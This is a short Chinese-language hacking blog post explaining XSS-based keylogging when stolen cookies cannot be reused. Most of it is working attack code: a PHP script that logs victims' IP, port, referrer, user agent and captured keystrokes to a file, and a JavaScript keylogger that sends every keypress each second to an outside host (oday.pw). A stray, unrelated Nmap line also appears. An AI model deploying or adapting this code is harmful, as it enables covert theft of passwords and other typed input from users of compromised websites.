XSS的键盘记录

作者：hack1990 时间：15-03-09 阅读数：1032人阅读

这种方法是非常公开的，但很多人仍然不知道它。

cookie时，从目标不能重复使用，您可以使用此方法。你需要一台主机上传：

g.php

<?php

$Keylog = $_GET["c"];

$reffer = $_SERVER['HTTP_REFERER'];

$ip = $_SERVER['REMOTE_ADDR'];

$date=date ("l dS of F Y h:i:s A");

$port = $_SERVER['REMOTE_PORT'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];

$file = fopen('data.txt', 'a');

fwrite($file, 'Ip: '.$ip."n");

fwrite($file, 'Port: '.$port."n");

fwrite($file, 'Refferer: '.$reffer."n");

fwrite($file, 'User Agent: '.$user_agent."n");

fwrite($file, 'Date: '.$date."n");

fwrite($file, $Keylog."n");

fwrite($file, "---------------------------nn");

fclose($file);

?>

k.js：

var keys='';

document.onkeypress = function(e) {

get = window.event?event:e;

key = get.keyCode?get.keyCode:get.charCode;

key = String.fromCharCode(key);

keys+=key;

}

window.setInterval(function(){

new Image().src = 'http://www.oday.pw:88/jj.php?c='+keys;

keys = '';

}, 1000);

# Nmap Security Scanner 7.0

上一篇：webshell如果躲过“加速乐黑客攻击拦截”

下一篇：完美过D盾,安全狗的php一句话

相关文章

发表评论